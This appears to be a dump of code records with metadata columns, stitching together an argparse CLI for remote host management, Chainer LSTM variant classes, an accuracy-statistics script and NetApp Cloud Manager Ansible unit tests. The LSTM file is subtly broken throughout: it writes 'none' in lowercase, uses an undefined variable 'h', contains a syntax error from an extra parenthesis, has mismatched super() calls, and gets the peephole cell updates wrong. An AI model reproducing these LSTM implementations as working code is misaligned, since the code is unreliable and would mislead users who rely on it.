from object_publisher.flask import Flask | 40.666667 | 42 | 0.860656 | 18 | 122 | 5.666667 | 0.444444 | 0.294118 | 0.558824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114754 | 122 | 3 | 43 | 40.666667 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e880c3307d07c03a340929a1e60add1a6c4dab7 | 2,790 | py | Python | modules/cli/runcli.py | serchaofan/oakleaf | 89f390ae931c38d69e5a51b8e1747e6f74238ac3 | [
"Apache-2.0"
] | null | null | null | modules/cli/runcli.py | serchaofan/oakleaf | 89f390ae931c38d69e5a51b8e1747e6f74238ac3 | [
"Apache-2.0"
] | null | null | null | modules/cli/runcli.py | serchaofan/oakleaf | 89f390ae931c38d69e5a51b8e1747e6f74238ac3 | [
"Apache-2.0"
] | null | null | null | import argparse
from modules import get, run
def parser_ping_options(parser):
parser.add_argument(
"-g", "--group", help="Ping Hosts in Group")
parser.add_argument("-H", "--host", help="Ping Single Host")
parser.add_argument(
"-A", "--all", action="store_true", help="Ping All Hosts")
parser.set_defaults(func=run.run_ping)
def parser_command_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-A", "--all", action="store_true")
parser.add_argument("-H", "--host")
parser.add_argument("command", nargs=argparse.REMAINDER)
parser.set_defaults(func=run.run_command)
def parser_script_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.add_argument("-f", "--file", required=True)
parser.add_argument("-a", "--argv", nargs=argparse.REMAINDER)
parser.set_defaults(func=run.run_script)
def parser_copy_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.add_argument("-f", "--file", required=True)
parser.add_argument("-d", "--dest")
parser.add_argument("-o", "--owner")
parser.add_argument("-p", "--perm")
parser.set_defaults(func=run.run_copy)
def parser_file_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.add_argument("-r", action="store_true")
parser.add_argument("-f", "--file", required=True)
parser.add_argument("-o", "--owner")
parser.add_argument("-p", "--perm")
parser.set_defaults(func=run.run_file)
def parser_sysinfo_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.set_defaults(func=run.run_sysinfo)
def parser_loadinfo_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.set_defaults(func=run.run_loadinfo)
def parser_chpass_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-u", "--user", required=True)
parser.add_argument("-p", "--passwd", required=True)
parser.set_defaults(func=run.run_chpass)
def parser_download_options(parser):
parser.add_argument("-g", "--group")
parser.add_argument("-H", "--host")
parser.add_argument("-A", "--all", action="store_true")
parser.add_argument("--url", required=True)
parser.set_defaults(func=run.run_download) | 34.875 | 66 | 0.665591 | 370 | 2,790 | 4.789189 | 0.140541 | 0.20316 | 0.383747 | 0.11851 | 0.828442 | 0.812077 | 0.781603 | 0.761287 | 0.704853 | 0.626975 | 0 | 0 | 0.132258 | 2,790 | 80 | 67 | 34.875 | 0.731929 | 0 | 0 | 0.516129 | 0 | 0 | 0.162666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145161 | false | 0.048387 | 0.032258 | 0 | 0.177419 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8e9b048ac1cab28a3600c906dccdce1beead7df9 | 11,508 | py | Python | chainer-1.5/LSTMVariants.py | ysadamori/chainer_LSTM_seq2seq_example | b13ec64e5035b1eb75b873431786d880577b7370 | [
"MIT"
] | 137 | 2015-09-08T00:37:13.000Z | 2021-05-13T21:50:52.000Z | chainer-1.5/LSTMVariants.py | ysadamori/chainer_LSTM_seq2seq_example | b13ec64e5035b1eb75b873431786d880577b7370 | [
"MIT"
] | 4 | 2016-01-29T16:42:38.000Z | 2017-01-11T08:01:08.000Z | chainer-1.5/LSTMVariants.py | ysadamori/chainer_LSTM_seq2seq_example | b13ec64e5035b1eb75b873431786d880577b7370 | [
"MIT"
] | 41 | 2015-09-28T14:09:34.000Z | 2021-05-13T21:50:53.000Z | import numpy
import chainer
from chainer.functions.activation import sigmoid
from chainer.functions.activation import tanh
from chainer import link
from chainer.links.connection import linear
class LSTMBase(link.Chain):
def __init__(self, n_units, n_inputs=None):
if n_inputs is None:
n_inputs = n_units
super(LSTMBase, self).__init__(
W_fh=linear.Linear(n_inputs, n_units),
W_ih=linear.Linear(n_inputs, n_units),
W_oh=linear.Linear(n_inputs, n_units),
W_ch=linear.Linear(n_inputs, n_units),
W_fx=linear.Linear(n_inputs, n_units),
W_ix=linear.Linear(n_inputs, n_units),
W_ox=linear.Linear(n_inputs, n_units),
W_cx=linear.Linear(n_inputs, n_units),
)
class CoupledForgetLSTMBase(link.Chain):
def __init__(self, n_units, n_inputs=None):
if n_inputs is None:
n_inputs = n_units
super(LSTMBase, self).__init__(
W_fh=linear.Linear(n_inputs, n_units),
W_oh=linear.Linear(n_inputs, n_units),
W_ch=linear.Linear(n_inputs, n_units),
W_fx=linear.Linear(n_inputs, n_units),
W_ox=linear.Linear(n_inputs, n_units),
W_cx=linear.Linear(n_inputs, n_units),
)
class PeepHoleLSTMBase(link.Chain):
def __init__(self, n_units, n_inputs=None):
if n_inputs is None:
n_inputs = n_units
super(PeepHoleLSTMBase, self).__init__(
W_fh=linear.Linear(n_inputs, n_units),
W_fc=linear.Linear(n_inputs, n_units),
W_ih=linear.Linear(n_inputs, n_units),
W_ic=linear.Linear(n_inputs, n_units),
W_oh=linear.Linear(n_inputs, n_units),
W_oc=linear.Linear(n_inputs, n_units),
W_ch=linear.Linear(n_inputs, n_units),
W_fx=linear.Linear(n_inputs, n_units),
W_ix=linear.Linear(n_inputs, n_units),
W_ox=linear.Linear(n_inputs, n_units),
W_cx=linear.Linear(n_inputs, n_units),
)
class CoupledForgetPeepHoleLSTMBase(link.Chain):
def __init__(self, n_units, n_inputs=None):
if n_inputs is None:
n_inputs = n_units
super(PeepHoleLSTMBase, self).__init__(
W_fh=linear.Linear(n_inputs, n_units),
W_fc=linear.Linear(n_inputs, n_units),
W_oh=linear.Linear(n_inputs, n_units),
W_oc=linear.Linear(n_inputs, n_units),
W_ch=linear.Linear(n_inputs, n_units),
W_fx=linear.Linear(n_inputs, n_units),
W_ox=linear.Linear(n_inputs, n_units),
W_cx=linear.Linear(n_inputs, n_units),
)
class StatefulLSTM(LSTMBase):
def __init__(self, in_size, out_size):
super(StatefulLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulLSTM, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
if self.c is not None:
self.c.to_cpu()
def to_gpu(self, device=None):
super(StatefulLSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h, c):
assert isinstance(h, chainer.Variable)
assert isinstance(c, chainer.Variable)
h_ = h
c_ = c
if self.xp == numpy:
h_.to_cpu()
c_.to_cpu()
else:
h_.to_gpu()
c_.to_gpu()
self.h = h_
self.c = c_
def reset_state(self):
self.h = None
self.c = None
def __call__(self, x):
ft = self.W_fx(x)
it = self.W_ix(x)
ct = self.W_cx(x)
ot = self.W_ox(x)
if self.h is not None:
ft += self.W_fh(h)
it += self.W_ih(h)
ct += self.W_ch(h)
ot += self.W_oh(h)
ft = sigmoid.sigmoid(ft)
it = sigmoid.sigmoid(it)
ct = tanh.tanh(ct)
ot = sigmoid.sigmoid(ot)
c = it * ct
if self.c is not none:
c += ft * self.c
self.c = c
self.h = ot * tanh.tanh(self.c)
return self.h
def get_state():
return self.c
class StatelessLSTM(LSTMBase):
def __init__(self, in_size, out_size):
super(StatelessLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
def __call__(self, x, h, c):
ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h))
it = sigmoid.sigmoid(self.W_ix(x) + self.W_ih(h))
ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h))
c = ft * c + it * ct
h = ot * tanh.tanh(c)
return h, c
class StatefulPeepHoleLSTM(PeepHoleLSTMBase):
def __init__(self, in_size, out_size):
super(StatefulPeepHoleLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulPeepHoleLSTM, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
if self.c is not None:
self.c.to_cpu()
def to_gpu(self, device=None):
super(StatefulPeepHoleLSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h, c):
assert isinstance(h, chainer.Variable)
assert isinstance(c, chainer.Variable)
h_ = h
c_ = c
if self.xp == numpy:
h_.to_cpu()
c_.to_cpu()
else:
h_.to_gpu()
c_.to_gpu()
self.h = h_
self.c = c_
def reset_state(self):
self.h = None
self.c = None
def __call__(self, x):
ft = self.W_fx(x)
it = self.W_ix(x)
ct = self.W_cx(x)
ot = self.W_ox(x)
if self.h is not None and self.c is not None:
ft += self.W_fh(h) + self.W_fc(self.c)
it += self.W_ih(h) + self.W_ic(self.c)
ct += self.W_ch(h)
ot += self.W_oh(h)
ft = sigmoid.sigmoid(ft)
it = sigmoid.sigmoid(it)
ct = tanh.tanh(ct)
ot = sigmoid.sigmoid(ot + self.W_oc(ct))
c = it * ct
if self.c is not none:
self.c += ft * c
self.h = ot * tanh.tanh(self.c)
return self.h
def get_state():
return self.c
class StatelessPeepHoleLSTM(PeepHoleLSTMBase):
def __init__(self, in_size, out_size):
super(StatelessPeepHoleLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
def __call__(self, x, h, c):
ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h) + self.W_fc(c))
it = sigmoid.sigmoid(self.W_ix(x) + self.W_ih(h) + self.W_ic(c))
ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
c = ft * c + it * ct
ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h) + self.W_oc(c))
h = ot * tanh.tanh(c)
return h, c
class CoupledForgetStatefulLSTM(CoupledForgetLSTMBase):
def __init__(self, in_size, out_size):
super(CoupledForgetStatefulLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(CoupledForgetStatefulLSTM, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
if self.c is not None:
self.c.to_cpu()
def to_gpu(self, device=None):
super(CoupledForgetStatefulLSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h, c):
assert isinstance(h, chainer.Variable)
assert isinstance(c, chainer.Variable)
h_ = h
c_ = c
if self.xp == numpy:
h_.to_cpu()
c_.to_cpu()
else:
h_.to_gpu()
c_.to_gpu()
self.h = h_
self.c = c_
def reset_state(self):
self.h = None
self.c = None
def __call__(self, x):
ft = self.W_fx(x)
ct = self.W_cx(x)
ot = self.W_ox(x)
if self.h is not None:
ft += self.W_fh(h)
ct += self.W_ch(h)
ot += self.W_oh(h)
ft = sigmoid.sigmoid(ft)
ct = tanh.tanh(ct)
ot = sigmoid.sigmoid(ot)
c = (1 - ft) * ct
if self.c is not none:
c += ft * self.c
self.c = c
self.h = ot * tanh.tanh(self.c)
return self.h
def get_state():
return self.c
class CoupledForgetStatelessLSTM(CoupledForgetLSTMBase):
def __init__(self, in_size, out_size):
super(CoupledForgetStatelessLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
def __call__(self, x, h, c):
ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h))
ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h))
c = ft * c + (1 - ft)) * ct
h = ot * tanh.tanh(c)
return h, c
class CoupledForgetStatefulPeepHoleLSTM(CoupledForgetPeepHoleLSTMBase):
def __init__(self, in_size, out_size):
super(CoupledForgetStatefulPeepHoleLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(CoupledForgetStatefulPeepHoleLSTM, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
if self.c is not None:
self.c.to_cpu()
def to_gpu(self, device=None):
super(CoupledForgetStatefulPeepHoleLSTM, self).to_gpu(device)
if self.c is not None:
self.c.to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h, c):
assert isinstance(h, chainer.Variable)
assert isinstance(c, chainer.Variable)
h_ = h
c_ = c
if self.xp == numpy:
h_.to_cpu()
c_.to_cpu()
else:
h_.to_gpu()
c_.to_gpu()
self.h = h_
self.c = c_
def reset_state(self):
self.h = None
self.c = None
def __call__(self, x):
ft = self.W_fx(x)
ct = self.W_cx(x)
ot = self.W_ox(x)
if self.h is not None and self.c is not None:
ft += self.W_fh(h) + self.W_fc(self.c)
ct += self.W_ch(h)
ot += self.W_oh(h)
ft = sigmoid.sigmoid(ft)
ct = tanh.tanh(ct)
ot = sigmoid.sigmoid(ot + self.W_oc(ct))
c = (1 - ft) * ct
if self.c is not none:
self.c += ft * c
self.h = ot * tanh.tanh(self.c)
return self.h
def get_state():
return self.c
class CoupledForgetStatelessPeepHoleLSTM(CoupledForgetPeepHoleLSTMBase):
def __init__(self, in_size, out_size):
super(CoupledForgetStatelessPeepHoleLSTM, self).__init__(out_size, in_size)
self.state_size = out_size
def __call__(self, x, h, c):
ft = sigmoid.sigmoid(self.W_fx(x) + self.W_fh(h) + self.W_fc(c))
ct = tanh.tanh(self.W_cx(x) + self.W_ch(h))
c = ft * c + (1 - ft) * ct
ot = sigmoid.sigmoid(self.W_ox(x) + self.W_oh(h) + self.W_oc(c))
h = ot * tanh.tanh(c)
return h, c
| 28.987406 | 83 | 0.561783 | 1,697 | 11,508 | 3.540365 | 0.044785 | 0.054927 | 0.049268 | 0.08006 | 0.87966 | 0.865846 | 0.86518 | 0.860519 | 0.860519 | 0.795606 | 0 | 0.000513 | 0.32195 | 11,508 | 396 | 84 | 29.060606 | 0.769448 | 0 | 0 | 0.859813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024922 | 0 | null | null | 0 | 0.018692 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ebc674adbcf8fb60f19b4b46bdd8687dbe4dbb6 | 1,232 | py | Python | code/mean_std.py | xuan525/COM3240-Supervised-Learning-Assignment | c5eef054b451a612fcd4293ecc49a37365777aef | [
"MIT"
] | null | null | null | code/mean_std.py | xuan525/COM3240-Supervised-Learning-Assignment | c5eef054b451a612fcd4293ecc49a37365777aef | [
"MIT"
] | null | null | null | code/mean_std.py | xuan525/COM3240-Supervised-Learning-Assignment | c5eef054b451a612fcd4293ecc49a37365777aef | [
"MIT"
] | null | null | null | import csv
import numpy as np
print('num_neuron')
print('x,y,std')
for n_neuron in [ 10, 50, 100, 150, 250, 400, 800 ]:
test_accs = []
for i in range(0, 10):
f_name = './log/num_neuron/{}.{}.csv'.format(n_neuron, i)
with open(f_name,'r') as csvfile:
reader = csv.reader(csvfile)
rows = [row for row in reader]
testrow = rows[-1]
test_acc = testrow[6]
test_accs.append(test_acc)
test_accs = np.array(test_accs, dtype=np.float)
mean = np.mean(test_accs)
std = np.std(test_accs)
print('{},{},{}'.format(n_neuron, mean, std))
print()
print('deep_layer')
print('x,y,std')
for n_neuron in [ 10, 50, 100, 150, 250, 400, 800 ]:
test_accs = []
for i in range(0, 10):
f_name = './log/deep_layer/{}.{}.csv'.format(n_neuron, i)
with open(f_name,'r') as csvfile:
reader = csv.reader(csvfile)
rows = [row for row in reader]
testrow = rows[-1]
test_acc = testrow[6]
test_accs.append(test_acc)
test_accs = np.array(test_accs, dtype=np.float)
mean = np.mean(test_accs)
std = np.std(test_accs)
print('{},{},{}'.format(n_neuron, mean, std))
print()
| 31.589744 | 65 | 0.569805 | 188 | 1,232 | 3.574468 | 0.255319 | 0.142857 | 0.077381 | 0.029762 | 0.895833 | 0.895833 | 0.895833 | 0.895833 | 0.895833 | 0.895833 | 0 | 0.053215 | 0.267857 | 1,232 | 38 | 66 | 32.421053 | 0.691796 | 0 | 0 | 0.833333 | 0 | 0 | 0.084416 | 0.042208 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8eeaff661cc0e42534a35731a6b70d9961e4a5f5 | 20,841 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/netapp/cloudmanager/tests/unit/plugins/modules/test_na_cloudmanager_cvo_azure.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/netapp/cloudmanager/tests/unit/plugins/modules/test_na_cloudmanager_cvo_azure.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/netapp/cloudmanager/tests/unit/plugins/modules/test_na_cloudmanager_cvo_azure.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # (c) 2021, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit tests Cloudmanager Ansible module: '''
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
from ansible_collections.netapp.cloudmanager.tests.unit.compat import unittest
from ansible_collections.netapp.cloudmanager.tests.unit.compat.mock import patch, Mock
from ansible_collections.netapp.cloudmanager.plugins.modules.na_cloudmanager_cvo_azure \
import NetAppCloudManagerCVOAZURE as my_module
def set_module_args(args):
'''prepare arguments so that they will be picked up during module creation'''
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access
class AnsibleExitJson(Exception):
'''Exception class to be raised by module.exit_json and caught by the test case'''
class AnsibleFailJson(Exception):
'''Exception class to be raised by module.fail_json and caught by the test case'''
def exit_json(*args, **kwargs): # pylint: disable=unused-argument
'''function to patch over exit_json; package return data into an exception'''
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
def fail_json(*args, **kwargs): # pylint: disable=unused-argument
'''function to patch over fail_json; package return data into an exception'''
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
class MockCMConnection():
''' Mock response of http connections '''
def __init__(self, kind=None, parm1=None):
self.type = kind
self.parm1 = parm1
# self.token_type, self.token = self.get_token()
class TestMyModule(unittest.TestCase):
''' a group of related Unit Tests '''
def setUp(self):
self.mock_module_helper = patch.multiple(basic.AnsibleModule,
exit_json=exit_json,
fail_json=fail_json)
self.mock_module_helper.start()
self.addCleanup(self.mock_module_helper.stop)
def set_default_args_pass_check(self):
return dict({
'state': 'present',
'name': 'TestA',
'client_id': 'test',
'location': 'westus',
'vnet_id': 'vpc-test',
'resource_group': 'test',
'subnet_id': 'subnet-test',
'subscription_id': 'test',
'cidr': '10.0.0.0/24',
'svm_password': 'password',
'refresh_token': 'myrefresh_token',
'is_ha': False
})
def set_args_create_cloudmanager_cvo_azure(self):
return dict({
'state': 'present',
'name': 'Dummyname',
'client_id': 'test',
'location': 'westus',
'vnet_id': 'vpc-test',
'resource_group': 'test',
'subscription_id': 'test',
'cidr': '10.0.0.0/24',
'subnet_id': 'subnet-test',
'svm_password': 'password',
'refresh_token': 'myrefresh_token',
'is_ha': False
})
def set_args_delete_cloudmanager_cvo_azure(self):
return dict({
'state': 'absent',
'name': 'Dummyname',
'client_id': 'test',
'location': 'westus',
'vnet_id': 'vpc-test',
'resource_group': 'test',
'subscription_id': 'test',
'cidr': '10.0.0.0/24',
'subnet_id': 'subnet-test',
'svm_password': 'password',
'refresh_token': 'myrefresh_token',
'is_ha': False
})
def test_module_fail_when_required_args_missing(self):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleFailJson) as exc:
set_module_args({})
my_module()
self.rest_api = MockCMConnection()
print('Info: %s' % exc.value.args[0]['msg'])
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
def test_module_fail_when_required_args_present(self, get_token):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleExitJson) as exc:
set_module_args(self.set_default_args_pass_check())
get_token.return_value = 'test', 'test'
my_module()
exit_json(changed=True, msg="TestCase Fail when required args are present")
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
def test_create_cloudmanager_cvo_azure_pass(self, get_post_api, get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
set_module_args(self.set_args_create_cloudmanager_cvo_azure())
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
def test_create_cloudmanager_cvo_azure_capacity_license_pass(self, get_post_api,
get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
data = self.set_args_create_cloudmanager_cvo_azure()
data['license_type'] = 'capacity-paygo'
data['capacity_package_name'] = 'Essential'
set_module_args(data)
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_capacity_license_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
def test_create_cloudmanager_cvo_azure_ha_capacity_license_pass(self, get_post_api,
get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
data = self.set_args_create_cloudmanager_cvo_azure()
data['is_ha'] = True
data['license_type'] = 'ha-capacity-paygo'
data['capacity_package_name'] = 'Professional'
set_module_args(data)
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_ha_capacity_license_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
def test_create_cloudmanager_cvo_azure_nodebase_license_pass(self, get_post_api,
get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
data = self.set_args_create_cloudmanager_cvo_azure()
data['license_type'] = 'azure-cot-premium-byol'
data['serial_number'] = '12345678'
set_module_args(data)
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_nodebase_license_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
def test_create_cloudmanager_cvo_azure_ha_nodebase_license_pass(self, get_post_api,
get_working_environment_details_by_name, get_nss,
get_tenant, wait_on_completion, get_token):
data = self.set_args_create_cloudmanager_cvo_azure()
data['is_ha'] = True
data['license_type'] = 'azure-ha-cot-premium-byol'
data['platform_serial_number_node1'] = '12345678'
data['platform_serial_number_node2'] = '23456789'
set_module_args(data)
get_token.return_value = 'test', 'test'
my_obj = my_module()
response = {'publicId': 'abcdefg12345'}
get_post_api.return_value = response, None, None
get_working_environment_details_by_name.return_value = None, None
get_nss.return_value = 'nss-test', None
get_tenant.return_value = 'test', None
wait_on_completion.return_value = None
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
print('Info: test_create_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
assert exc.value.args[0]['changed']
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
@patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
